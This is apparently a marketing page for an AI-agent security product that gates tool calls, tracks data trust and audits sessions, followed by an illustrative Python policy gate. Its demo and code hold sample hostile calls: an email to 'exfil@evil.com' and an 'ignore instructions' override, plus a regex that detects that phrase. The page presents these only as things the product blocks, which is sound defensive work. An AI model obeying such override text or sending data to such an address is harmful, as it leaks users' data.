The enterprise control plane for AI agents

Identity, security, and memory on one layer. Every agent gets a credential. Every tool call is checked before execution. Every memory query is filtered by privilege. Not two products. One plane.

539+ platform tests
Sub-ms hot path
7 prevention layers
Split-brain memory
$ pip install agentshield

$ agentshield init --name "research-agent"
  Agent registered: prin_e7c19a667f95

$ agentshield run "python agent.py"
  Agentic Glass v0.1 | enforce mode

  search("Q1 revenue")           ALLOW
  read_db("SELECT * users")      ALLOW
  send_email(exfil@evil.com)     DENY scope
  deploy("ignore instructions")  DENY injection

One control plane. Three pillars.

Identity, prevention, and governed memory ship together. Security teams get audit and policy. Developers keep their existing agents.

01

Prevent

Seven detection layers inspect every tool call before execution. Taint propagation tracks data trust. Tool ordering blocks exfiltration patterns. Mandates scope every session.

  • Prompt injection detection (F1 = 0.94)
  • Tool execution order enforcement
  • Taint propagation (6-level trust)
  • Memory poisoning defense
  • Output sanitization
  • Pre-decision safety gates

02

Identity

Every agent gets an identity. Every identity has an owner. Every action is authorized against a scoped credential that attenuates monotonically.

  • Agent registration and ownership
  • UCAN-based credential delegation
  • Cascade revocation
  • Per-session agent mandates
  • Okta / Azure AD federation
  • Complete audit trail

03

Govern

Governed memory, communication monitoring, and automated containment. Agents share knowledge but never leak across permission boundaries.

  • Privilege-tiered knowledge brain
  • Inter-agent communication bus
  • Auto-quarantine on threshold
  • Business impact scoring
  • Compliance evidence generation
  • SIEM export (Splunk, Datadog)

Three commands to production security

No SDK rewrite. No infrastructure changes. Wraps your existing agent.

1

Install

Works with LangChain, CrewAI, AutoGen, Claude MCP, and any Python agent.

$ pip install agentshield

2

Protect

Register your agent. Set the scope. Every tool call is inspected and authorized inline.

$ agentshield init && agentshield run "python agent.py"

3

Monitor

Real-time dashboard. Investigate sessions. Export to SIEM. Full audit trail.

$ agentshield dashboard

See blocks, memory, and audit in one dashboard

Walk through fixture-backed block stories, split-brain memory, hash-chained audit, and CISO overview. Password-protected demo on AWS.

Free for developers. Forever.

The core detection pipeline, taint propagation, tool ordering, and policy engine are MIT-licensed. No feature limits. No usage caps. No trial period.

# Install
pip install agentshield

# Protect your agent
agentshield run "python my_agent.py"

# Or wrap an MCP server
agentshield mcp-config \
  --target "npx @mcp/server-fs /" \
  --api https://your-server

# What's included (OSS):
#   Detection layers 1-3
#   Taint propagation
#   Tool execution ordering
#   Agent mandates
#   Memory poisoning defense
#   Output sanitization
#   Policy engine
#   MCP proxy
#   CLI + JSON audit log
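As an added, illustrative example (not AgentShield's own code or API): a minimal inline gate in the spirit of the pipeline above. It replays the four calls from the terminal transcript against a constructed session mandate, applies a scope check, a toy injection pattern and a taint rule that blocks untrusted data from flowing to an external sink, and writes each decision to a hash-chained JSON audit log with a verifier. The mandate keys, the regex and the record layout are assumptions.

```python
import hashlib
import json
import re
# Constructed session mandate (an assumption, not the product's real policy format).
MANDATE = {
    "allowed_tools": {"search", "read_db", "send_email", "deploy"},
    "email_domains": {"example.com"},            # send_email may only deliver in scope
    "untrusted_sources": {"search", "read_db"},  # their output taints the context
    "external_sinks": {"send_email"},            # tainted context must not reach these
}
INJECTION_RE = re.compile(r"ignore\s+(?:\w+\s+)*instructions", re.I)  # toy detector

def check_call(tool, arg, taint, mandate=MANDATE):
    """Gate one tool call; taint is the set of untrusted tools whose output is in context."""
    if tool not in mandate["allowed_tools"]:
        return "DENY", "scope"
    if INJECTION_RE.search(arg):
        return "DENY", "injection"
    if tool == "send_email" and arg.rsplit("@", 1)[-1] not in mandate["email_domains"]:
        return "DENY", "scope"
    if tool in mandate["external_sinks"] and taint:
        return "DENY", "taint"  # ordering rule: untrusted data must not flow to an external sink
    return "ALLOW", ""

def _link(prev_hash, event):  # hash of one record, bound to the previous record's hash
    return hashlib.sha256((prev_hash + json.dumps(event, sort_keys=True)).encode()).hexdigest()

def append_audit(chain, event):
    prev_hash = chain[-1]["hash"] if chain else "0" * 64
    chain.append({"prev": prev_hash, "event": event, "hash": _link(prev_hash, event)})

def verify_chain(chain):
    """Recompute every link; an edited or reordered record breaks the chain."""
    prev_hash = "0" * 64
    for rec in chain:
        if rec["prev"] != prev_hash or rec["hash"] != _link(prev_hash, rec["event"]):
            return False
        prev_hash = rec["hash"]
    return True

def run_session(calls):  # gate calls in order, propagate taint, audit every decision
    chain, taint, decisions = [], set(), []
    for tool, arg in calls:
        decision, reason = check_call(tool, arg, taint)
        if decision == "ALLOW" and tool in MANDATE["untrusted_sources"]:
            taint.add(tool)
        append_audit(chain, {"tool": tool, "arg": arg, "decision": decision, "reason": reason})
        decisions.append((tool, decision, reason))
    return decisions, chain
# Constructed replay of the four calls in the terminal transcript above.
SAMPLE_CALLS = [("search", "Q1 revenue"), ("read_db", "SELECT * users"),
                ("send_email", "exfil@evil.com"), ("deploy", "ignore instructions")]
```

The taint rule goes one step beyond the transcript: a send_email to an in-scope domain is still denied once an untrusted read has landed in the context.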

Ship agents with controls built in.

Open source SDK for developers. Enterprise plane for security and platform teams.